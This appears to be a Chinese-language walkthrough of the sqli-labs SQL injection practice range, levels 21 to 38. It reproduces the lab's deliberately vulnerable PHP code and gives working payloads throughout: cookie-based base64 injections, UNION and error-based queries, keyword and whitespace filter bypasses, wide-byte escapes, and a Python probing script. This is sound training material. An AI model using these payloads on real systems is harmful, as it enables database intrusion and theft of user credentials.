Less-21:括号+单引号绕过+base64cookie编码
总感觉我已经把sql注入做成代码审计了:P
1 <?php 2 //including the Mysql connect parameters. 3 include("../sql-connections/sql-connect.php"); 4 if(!isset($_COOKIE['uname'])) 5 { 6 //including the Mysql connect parameters. 7 include("../sql-connections/sql-connect.php"); 8 9 echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome <font color='#FF0000'> Dhakkan </font><br></div>"; 10 echo "<div align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>"; 11 echo "<div style='padding-top:10px; font-size:15px;'>"; 12 13 14 echo "<!--Form to post the contents -->"; 15 echo '<form action=" " name="form1" method="post">'; 16 17 echo ' <div style="margin-top:15px; height:30px;">Username : '; 18 echo ' <input type="text" name="uname" value=""/> </div>'; 19 20 echo ' <div> Password : '; 21 echo ' <input type="text" name="passwd" value=""/></div></br>'; 22 echo ' <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>'; 23 24 echo '</form>'; 25 echo '</div>'; 26 echo '</div>'; 27 echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">'; 28 echo '<font size="3" color="#FFFF00">'; 29 echo '<center><br><br><br>'; 30 echo '<img src="../images/Less-21.jpg" />'; 31 echo '</center>'; 32 33 function check_input($value) 34 { 35 if(!empty($value)) 36 { 37 $value = substr($value,0,20); // truncation (see comments) 38 } 39 if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled 40 { 41 $value = stripslashes($value); 42 } 43 if (!ctype_digit($value)) // Quote if not a number 44 { 45 $value = "'" . mysql_real_escape_string($value) . "'"; 46 } 47 else 48 { 49 $value = intval($value); 50 } 51 52 return $value; 53 } 54 echo "<br>"; 55 echo "<br>"; 56 if(isset($_POST['uname']) && isset($_POST['passwd'])) 57 { 58 59 echo "<h1>hello master*****************************************************************************************</h1>"; 60 61 $uname = check_input($_POST['uname']); 62 $passwd = check_input($_POST['passwd']); 63 64 $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"; 65 $result1 = mysql_query($sql); 66 $row1 = mysql_fetch_array($result1); 67 68 echo "\n<h1>hello#####################################################################################################333</h1>\n"; 69 if($row1) 70 { 71 echo '<font color= "#FFFF00" font size = 3 >'; 72 setcookie('uname', base64_encode($row1['username']), time()+3600); 73 74 echo "I LOVE YOU COOKIES"; 75 echo "</font>"; 76 echo '<font color= "#0000ff" font size = 3 >'; 77 echo 'Your Cookie is: ' .$cookee; 78 echo "</font>"; 79 echo "<br>"; 80 print_r(mysql_error()); 81 echo "<br><br>"; 82 echo '<img src="../images/flag.jpg" />'; 83 echo "<br>"; 84 header ('Location: index.php'); 85 } 86 else 87 { 88 echo '<font color= "#0000ff" font size="3">'; 89 echo "Try again looser"; 90 print_r(mysql_error()); 91 echo "</br>"; 92 echo "</br>"; 93 echo '<img src="../images/slap.jpg" />'; 94 echo "</font>"; 95 } 96 } 97 98 echo "</font>"; 99 echo '</font>'; 100 echo '</div>'; 101 102 } 103 else 104 { 105 106 if(!isset($_POST['submit'])) 107 { 108 $cookee = $_COOKIE['uname']; 109 110 echo "<h1>hello master$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$</h1>"; 111 112 $format = 'D d M Y - H:i:s'; 113 $timestamp = time() + 3600; 114 115 echo "<center>"; 116 echo "<br><br><br><b>"; 117 echo '<img src="../images/Less-21.jpg" />'; 118 echo "<br><br><b>"; 119 echo '<br><font color= "red" font size="4">'; 120 echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT']; 121 echo "</font><br>"; 122 echo '<font color= "cyan" font size="4">'; 123 echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR']; 124 echo "</font><br>"; 125 echo '<font color= "#FFFF00" font size = 4 >'; 126 echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>"; 127 echo '<font color= "orange" font size = 5 >'; 128 echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp); 129 130 $cookee = base64_decode($cookee); 131 echo "<br></font>"; 132 $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1"; 133 $result=mysql_query($sql); 134 135 if (!$result) 136 { 137 die('Issue with your mysql: ' . mysql_error()); 138 } 139 $row = mysql_fetch_array($result); 140 if($row) 141 { 142 echo '<font color= "pink" font size="5">'; 143 echo 'Your Login name:'. $row['username']; 144 echo "<br>"; 145 echo '<font color= "grey" font size="5">'; 146 echo 'Your Password:' .$row['password']; 147 echo "</font></b>"; 148 echo "<br>"; 149 echo 'Your ID:' .$row['id']; 150 } 151 else 152 { 153 echo "<center>"; 154 echo '<br><br><br>'; 155 echo '<img src="../images/slap1.jpg" />'; 156 echo "<br><br><b>"; 157 //echo '<img src="../images/Less-20.jpg" />'; 158 } 159 echo '<center>'; 160 echo '<form action="" method="post">'; 161 echo '<input type="submit" name="submit" value="Delete Your Cookie!" />'; 162 echo '</form>'; 163 echo '</center>'; 164 } 165 else 166 { 167 echo '<center>'; 168 echo "<br>"; 169 echo "<br>"; 170 echo "<br>"; 171 echo "<br>"; 172 echo "<br>"; 173 echo "<br>"; 174 echo '<font color= "#FFFF00" font size = 6 >'; 175 echo " Your Cookie is deleted"; 176 setcookie('uname', base64_encode($row1['username']), time()-3600); 177 header ('Location: index.php'); 178 echo '</font></center></br>'; 179 180 } 181 182 183 echo "<br>"; 184 echo "<br>"; 185 //header ('Location: main.php'); 186 echo "<br>"; 187 echo "<br>"; 188 189 //echo '<img src="../images/slap.jpg" /></center>'; 190 //logging the connection parameters to a file for analysis. 191 $fp=fopen('result.txt','a'); 192 fwrite($fp,'Cookie:'.$cookee."\n"); 193 194 fclose($fp); 195 196 } 197 ?>
注意点:
- 不要submit参数
- cookie要有一个uname的参数
- cookie的参数要base64编码过的
- 绕过条件是括号加单引号
查数据库:
uname=YWRtaW4nKSAgYW5kIChzZWxlY3QgMSBmcm9tIChzZWxlY3QgY291bnQoKiksY29uY2F0X3dzKCctJywoc2VsZWN0IGRhdGFiYXNlKCkpLGZsb29yKHJhbmQoMCkqMikpIGFzIGEgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IGEpIGIpIw==
查数据表:
uname=YWRtaW4nKSB1bmlvbiAoU0VMRUNUICogRlJPTSAoU0VMRUNUIG5hbWVfY29uc3QoKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSwxKSxuYW1lX2NvbnN0KChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSksMSkpIGEpIw==
Less-22:双引号绕过+21套路
查数据表:
payload:admin" union (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)) a)#
Cookie:uname=YWRtaW4iIHVuaW9uIChTRUxFQ1QgKiBGUk9NIChTRUxFQ1QgbmFtZV9jb25zdCgoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkpLDEpLG5hbWVfY29uc3QoKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSwxKSkgYSkj
Less-23:普通的注入+get
这里貌似用不了注释,但是可以用逻辑绕过
?id=-1' union select 1,2,3 and '1
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 and '1
Less-24:约束攻击
hint:
利用:假设我们只知道一个账号 "admin" , 然后在注册哪里创建新用户
username=admin ***&password=i hack you&re_password=i hack you&submit=Register
然后就可以用 “admin”(账号) 和 “i hack you” (密码)登陆了
Less-25:对and or进行了绕过
这里我用的是 “ regexp” 代替 “ and ”
双写也可以:?id=-1' union select 1,(select group_concat(table_name) from infoORrmation_schema.tables where table_schema=database()),database() --+
Less-25a:和25一样不过他不用加'
?id=1 regexp 0 与 ?id=1 regexp 1 回显不同判断可注入
?id=-1 union select 1,database(),(select group_concat(table_name) from infoORrmation_schema.tables where table_schema=database())--+
Less-26:空格过滤
参考:Sqli-Labs:Less 26 - Less 26a
在 Windows 下会有无法用特殊字符代替空格的问题,这是 Apache 解析的问题,Linux 下无这个问题,然后这是根据网上的一位师傅改的脚本判断那些url编码可以代替空格
''' @Modify Time @Author 判断哪些 URL 编码能够代替空格 ------------ ------- 2019/10/6 13:34 laoalo python3版本 ''' import requests from lxml import etree def changeToHex(num): tmp = hex(num).replace("0x", "") if len(tmp)<2: tmp = '0' + tmp # print(tmp) return "%" + tmp req = requests.session() for i in range(0,256): i = changeToHex(i) # url = 'http://192.168.199.190/sqli-labs-master/Less-26/?id=-1"'+i+'regexp'+i+'"1"--+' url = "http://192.168.199.190/sqli-labs-master/Less-26/?id=1'" + i + "%26%26" + i + "'1'='1" ret = req.get(url).text if etree.HTML(ret).xpath("//font[@size='5']/text()"): elment = etree.HTML(ret).xpath("//font[@size='5']/text()")[0][-4:-1] if elment == 'Dum': print("good,this can use:" + i) #python2版本 # import requests # # def changeToHex(num): # tmp = hex(i).replace("0x", "") # if len(tmp)<2: # tmp = '0' + tmp # return "%" + tmp # # req = requests.session() # for i in range(0,256): # i = changeToHex(i) # # url = 'http://192.168.199.190/sqli-labs-master/Less-26/?id=1"' + i + 'regexp' + i + '"1"--+' # # url = "http://192.168.199.190/sqli-labs-master/Less-26/?id=1'" + i + "%26%26" + i + "'1'='1" # ret = req.get(url) # if 'Dumb' in ret.content: # print "good,this can use:" + i
PS:虽然可以爆破出来但是还是需要一个一个实验,有点在其他构造中会有特殊含义所以是不能用的,经我测试在winds中也是可以的
D:\大蟒蛇\python.exe C:/1.py good,this can use:%09 good,this can use:%0a good,this can use:%0b good,this can use:%0c good,this can use:%0d good,this can use:%20 good,this can use:%22 good,this can use:%23 good,this can use:%27 good,this can use:%2a good,this can use:%2d good,this can use:%2f good,this can use:%5c good,this can use:%a0 Process finished with exit code 0
回显不同判断出单引号:?id=0'%a0aandnd%a0'1 和 ?id=1'%a0aandnd%a0'1
?id=0'%a0union%a0select%a02,group_concat(table_name),3%a0from%a0infoORrmation_schema.tables%a0where%a0table_schema=database()%a0aandnd%a0'1
还有一个坑点就是不要用 " id=-1 “
Less-26a:小括号
?id=2'aandnd'1'='1,回显的是第一条语句,说明查询条件是 “ where id=( '$id' ) ”,存在小括号。
( '2' and '1' = '1' ) ===》(1)===》“ where id=1 ”
('2') and '1'=('1') ===》 “ where id=2 and 1” ===》" where id=2 "
?id=0')%a0union%a0select%a01,group_concat(table_name),2%a0from%a0infoORrmation_schema.tables%a0where%a0table_schema=database()%a0aandnd%a0'1'=('1
参考:Sqli-Labs:Less 26 - Less 26a
0x01. 如何判断注入类型与过滤条件
在没有过滤时,第一件事是判断注入类型,是字符型还是数字型。而有过滤时,判断注入类型后最重要的就是判断过滤条件。
- 在 Less 25 与 Less 26 中,既有正确回显,也有错误回显。找到注入类型后在构造的错误回显前加上字符便可依次看出过滤了哪些字符。
- 在 Less 25a 与本关中,错误回显被关闭,找到过滤字符便很重要,不过大体与有错误回显时相同(因为有正确回显)。
我们知道有一个函数是
intval(),作用是获取变量的整数值。但无错误回显时,我们如何区分是被过滤还是被转为整型呢?intval('#1') = 0 intval('1') = 1只需要在
1前面加上#,若被过滤则会正常显示,被转为整形则会为0。
步骤1:注入类型
1和1"正常回显,1'报错,判断为字符型,但是还要判断是否有小括号。判断小括号有几种方法:
2'&&'1'='1若查询语句为
where id='$id',查询时是where id='2'&&'1'='1',结果是where id='2',回显会是id=2。若查询语句为
where id=('$id'),查询时是where id=('2'&&'1'='1'),MySQL 将'2'作为了 Bool 值,结果是where id=('1'),回显会是id=1。1')||'1'=('1若查询语句有小括号正确回显,若无小括号错误回显(无回显)。
Less-27:单引号+union+select过滤
?id=1'and'0 与 ?id=1'and'1 :不同回显得到单引号绕。双写绕过滤。话说password是不是还有所处理database()结果没有回显。
?id=0'%a0ununionion%a0selSELECTect%a01,(selSELECTect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()%a0and%a0'1
Less-27a:双引号
?id=1"and"0 和 ?id=1"and"1:回显不同得到双引号。
?id=0"%a0ununionion%a0selSELECTect%a01,(selSELECTect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()%a0and%a0"1
Less-28:GET - Error Based- All your UNION & SELECT Belong to us - String -single quote with parenthesis
?id=1'and'1 ,?id=1'and'0 :回显不同得到单引号闭合
?id=2'and'1'='1 :回显第一条数据,说明存在小括号
?id=0')%0cunion(select%0c1,(select%0cgroup_concat(table_name)%0cfrom%0cinformation_schema.tables%0cwhere%0ctable_schema=database()),'database()
Less-28a: GET - Blind Based- All your UNION & SELECT Belong to us -single quote-parenthesis
?id=1'and'0 , ?id=1'and'0 : 单引号闭合
?id=3'and'1 :回显第一条数据,小括号闭合
?id=0')%0bunion%0bselect%0b1,group_concat(table_name),database()%0bfrom information_schema.tables%0bwhere%0btable_schema=database()%0band ('1
Less-29:Less-29 Protection with WAFGET -Error based- IMPIDENCE MISMATCH- Ha ...
?id=1'and'0 , ?id=1'and'1 : 回显不同,单引号绕过
?id=2' order by 4--+ : 根据回显只有三列
?id=0' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+ 好吧没看出来它的waf在哪里○| ̄|_ :
查一下源码,index.php,hacked.php里面都没什么,就login.php里面有两个特殊的函数:
<html> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <TITLE>Less-29 WAF BYPASS</TITLE> </HEAD> <body bgcolor="#000000"> <div style=" margin-top:50px;color:#FFF; font-size:40px; text-align:center"><font color="#FF0000"> <center> <img src="../images/slap1.jpg"> <br> <br> <font size="4"> <a href="login.php">Go Back and Try again</a> </font> <br> <br> <img src="../images/waf.jpg"> <br> </center> </body> </html> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Less-29 Protection with WAF</title> </head> <body bgcolor="#000000"> <div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br> <font size="3" color="#FFFF00"> <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); //disable error reporting error_reporting(0); // take the variables if(isset($_GET['id'])) { $qs = $_SERVER['QUERY_STRING']; $hint=$qs; $id1=java_implimentation($qs); /** * java_implimentation($qs):得到id值的前30个字符 * @var [type] */ $id=$_GET['id']; //echo $id1; whitelist($id1); /** whitelist($id1); * 对id1进行了正则过滤,id的前30个字符只能是数字 */ //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value"; } //WAF implimentation with a whitelist approach..... only allows input to be Numeric. function whitelist($input) { $match = preg_match("/^\d+$/", $input); if($match) { //echo "you are good"; //return $match; } else { header('Location: hacked.php'); //echo "you are bad"; } } // The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution). function java_implimentation($query_string) { $q_s = $query_string; $qs_array= explode("&",$q_s); /** * 将传入的参数用&分割,保存为一个数组 */ foreach($qs_array as $key => $value) { $val=substr($value,0,2); /** $val=substr($value,0,2); * 截取每一个参数的前两个字符,看他们是不是id * @var [type] */ if($val=="id") { $id_value=substr($value,3,30); /** * 如果传入的是id就截取他后面的30个字符(id=[30个]) */ return $id_value; echo "<br>"; break; } } } ?> </font> </div></br></br></br><center> <img src="../images/Less-29.jpg" /> </br> </br> </br> <img src="../images/Less-29-1.jpg" /> </br> </br> <font size='4' color= "#33FFFF"> <?php echo "Hint: The Query String you input is: ".$hint; ?> <br> <br> Reference: <br> <a href="https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf">AppsecEU09_CarettoniDiPaola_v0.8.pdf</a><br> <a href="https://community.qualys.com/servlet/JiveServlet/download/38-10665/Protocol-Level Evasion of Web Application Firewalls v1.1 (18 July 2012).pdf">https://community.qualys.com/servlet/JiveServlet/download/38-10665/Protocol-Level Evasion of Web Application Firewalls v1.1 (18 July 2012).pdf</a> </font> </center> </body> </html>
既然过滤还是比较严格的,那为什么?后来在login里加了一个回显:
所以说是没有用这个login.php吗...
Less-30:
?id=1" and "0 , ?id=1" and "1 : 双引号闭合
?id=1" order by 4--+ , ?id=1" order by 3--+ : 列数为3
?id=-1" union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
感觉是不是我的靶场出问题了○| ̄|_,莫名的轻松。
Less-31:
?id=2")--+ : 双引号 ,与括号闭合
?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
Less-32:宽字节注入
终于有过滤了,我居然有点开心Orz,查了一下源码,发现这里超级强大的strToHex函数原来只是一个幌子啊
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Less-32 **Bypass addslashes()**</title> </head> <body bgcolor="#000000"> <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br> <font size="5" color="#00FF00"> <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); function check_addslashes($string) { /** * preg_quote — 转义正则表达式字符 说明 ¶ preg_quote ( string $str [, string $delimiter = NULL ] ) : string preg_quote()需要参数 str 并向其中 每个正则表达式语法中的字符前增加一个反斜线。 这通常用于你有一些运行时字符串 需要作为正则表达式进行匹配的时候。 正则表达式特殊字符有: . \ + * ? [ ^ ] $ ( ) { } = ! < > | : - 参数 ¶ str 输入字符串 delimiter 如果指定了可选参数 delimiter,它也会被转义。这通常用于 转义PCRE函数使用的分隔符。 / 是最常见的分隔符。 返回值 ¶ 返回转义后的字符串。 例如 ¶ <?php $keywords = '$40 for a g3/400'; $keywords = preg_quote($keywords, '/'); echo $keywords; // 返回 \$40 for a g3\/400 ?> * @var [type] */ /** * preg_replace — 执行一个正则表达式的搜索和替换 说明 ¶ preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) : mixed 搜索subject中匹配pattern的部分, 以replacement进行替换。 * @var [type] */ $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string); //escape any backslash $string = preg_replace('/\'/i', '\\\'', $string); //escape single quote with a backslash $string = preg_replace('/\"/', "\\\"", $string); //escape double quote with a backslash return $string; } // take the variables if(isset($_GET['id'])) { $id=check_addslashes($_GET['id']); /**check_addslashes($_GET['id']) * 搜索string中的单引号,双引号放斜杠对他们进行转义 */ //echo "The filtered request is :" .$id . "<br>"; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity mysql_query("SET NAMES gbk"); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo '<font color= "#00FF00">'; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value"; } ?> </font> </div></br></br></br><center> <img src="../images/Less-32.jpg" /> </br> </br> </br> </br> </br> <font size='4' color= "#33FFFF"> <?php function strToHex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } echo "Hint: The Query String you input is escaped as : ".$id ."<br>"; echo "The Query String you input in Hex becomes : ".strToHex($id). "<br>"; ?> </center> </font> </body> </html>
这里用 %E4 来和后来插入的 \ 构成一个汉字进而释放 ‘
1 <?php 2 echo urlencode("中"); //回显 :%E4%B8%AD 3 echo urlencode("\\'");//回显 : %5C%27 4 echo urldecode("%E4%5c%27");//回显 :�\' 5 ?>
?id=0%E4' union select 1,group_concat(table_name),database() from information_schema.tables where table_schema=database()--+
Less-33:
有点尴尬的是我居然用32的payload做出33的题。
?id=1%E4' and 1--+ ,?id=1%E4' and 0--+ :单引号闭合
还好他后台的过滤是不一样的,33用了一个addslashes函数
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Less-32 **Bypass addslashes()**</title> </head> <body bgcolor="#000000"> <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br> <font size="5" color="#00FF00"> <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); function check_addslashes($string) { $string= addslashes($string); return $string; } // take the variables if(isset($_GET['id'])) { $id=check_addslashes($_GET['id']); //echo "The filtered request is :" .$id . "<br>"; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity mysql_query("SET NAMES gbk"); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo '<font color= "#00FF00">'; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value";} ?> </font> </div></br></br></br><center> <img src="../images/Less-33.jpg" /> </br> </br> </br> </br> </br> <font size='4' color= "#33FFFF"> <?php function strToHex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } echo "Hint: The Query String you input is escaped as : ".$id ."<br>"; echo "The Query String you input in Hex becomes : ".strToHex($id); ?> </center> </font> </body> </html>
addslashes ( string $str ) : string
- 返回字符串,该字符串为了数据库查询语句等的需要在某些字符前加上了反斜线。这些字符是单引号(')、双引号(")、反斜线(\)与 NUL(NULL 字符)。 一个使用 addslashes() 的例子是当你要往数据库中输入数据时。 例如,将名字 O'reilly 插入到数据库中,这就需要对其进行转义。仅仅是为了获取插入数据库的数据,额外的 \ 并不会插入。 当 PHP 指令 magic_quotes_sybase 被设置成 on 时,意味着插入 ' 时将使用 ' 进行转义。
- PHP 5.4 之前 PHP 指令 magic_quotes_gpc 默认是 on, 实际上所有的 GET、POST 和 COOKIE 数据都用被 addslashes() 了。 不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导致双层转义。 遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。
- 参数: str: 要转义的字符。
- 返回值: 返回转义后的字符。
- 范例:
1 Example #1 一个 addslashes() 例子 2 <?php 3 $str = "Is your name O'reilly?"; 4 // 输出: Is your name O\'reilly? 5 echo addslashes($str); 6 ?>
Less-34:对用户名和密码都进行了addslashes()
这里的连接词要用or,%df后的用户名一定是不对的
uname=admin%df' or 1--+&passwd=1--+ ,uname=admin%df' or 0--+&passwd=1--+ :回显不同得到单引号闭合
uname=admin%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+&passwd=1--+
<?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); // take the variables if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname1=$_POST['uname']; $passwd1=$_POST['passwd']; //echo "username before addslashes is :".$uname1 ."<br>"; //echo "Input password before addslashes is : ".$passwd1. "<br>"; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'User Name:'.$uname1); fwrite($fp,'Password:'.$passwd1."\n"); fclose($fp); $uname = addslashes($uname1); $passwd= addslashes($passwd1); //echo "username after addslashes is :".$uname ."<br>"; //echo "Input password after addslashes is : ".$passwd; // connectivity mysql_query("SET NAMES gbk"); @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { //echo '<font color= "#0000ff">'; echo "<br>"; echo '<font color= "#FFFF00" font size = 4>'; //echo " You Have successfully logged in\n\n " ; echo '<font size="3" color="#0000ff">'; echo "<br>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "<br>"; echo "</font>"; echo "<br>"; echo "<br>"; echo '<img src="../images/flag.jpg" />'; echo "</font>"; } else { echo '<font color= "#0000ff" font size="3">'; //echo "Try again looser"; print_r(mysql_error()); echo "</br>"; echo "</br>"; echo "</br>"; echo '<img src="../images/slap.jpg" />'; echo "</font>"; } } ?> </br> </br> </br> <font size='4' color= "#33FFFF"> <?php echo "Hint: The Username you input is escaped as : ".$uname ."<br>"; echo "Hint: The Password you input is escaped as : ".$passwd ."<br>"; ?> </font> </div> </body> </html>
Less-35: addslashes($string)
?id=1 and 0 , ?id=1 and 1 : 回显不同数字型的
?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database()--+
感觉他简单的对不起自己35题的身份,还是查一下源码吧。
<?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); /** * 还是那个老配方 * @param [type] check_addslashes($string) */ function check_addslashes($string) { $string = addslashes($string); return $string; } // take the variables if(isset($_GET['id'])) { $id=check_addslashes($_GET['id']); //echo "The filtered request is :" .$id . "<br>"; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity mysql_query("SET NAMES gbk"); $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo '<font color= "#00FF00">'; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value"; } ?>
查完源码后,没错,哥就这么简单Orz。
Less-36:mysql_real_escape_string()
?id=1%df' and 0--+ , ?id=1%df' and 1--+ : 单引号闭合,根据回显可以看出有过滤
?id=0%df' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
<?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); function check_quotes($string) { $string= mysql_real_escape_string($string); return $string; /** * mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。 下列字符受影响: \x00 ,\n ,\r ,\ ,' ," ,\x1a 如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。 语法: mysql_real_escape_string(string,connection) 参数 :描述 string :必需。规定要转义的字符串。 connection :可选。规定 MySQL 连接。如果未规定,则使用上一个连接。 */ } // take the variables if(isset($_GET['id'])) { $id=check_quotes($_GET['id']); //echo "The filtered request is :" .$id . "<br>"; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity mysql_query("SET NAMES gbk"); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo '<font color= "#00FF00">'; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value";} ?> <?php function strToHex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } echo "Hint: The Query String you input is escaped as : ".$id ."<br>"; echo "The Query String you input in Hex becomes : ".strToHex($id); ?>
Less-37:
uname=admin%df' or 1--+&passwd=admin&submit=Submit , uname=admin%df' or 0--+&passwd=admin&submit=Submit :回显不同单引号闭合
uname=admin%df' union select database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+&passwd=admin&submit=Submit
Less-38:
?id=1' and 1--+ , ?id=1' and 0--+ :回显不同单引号闭合
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
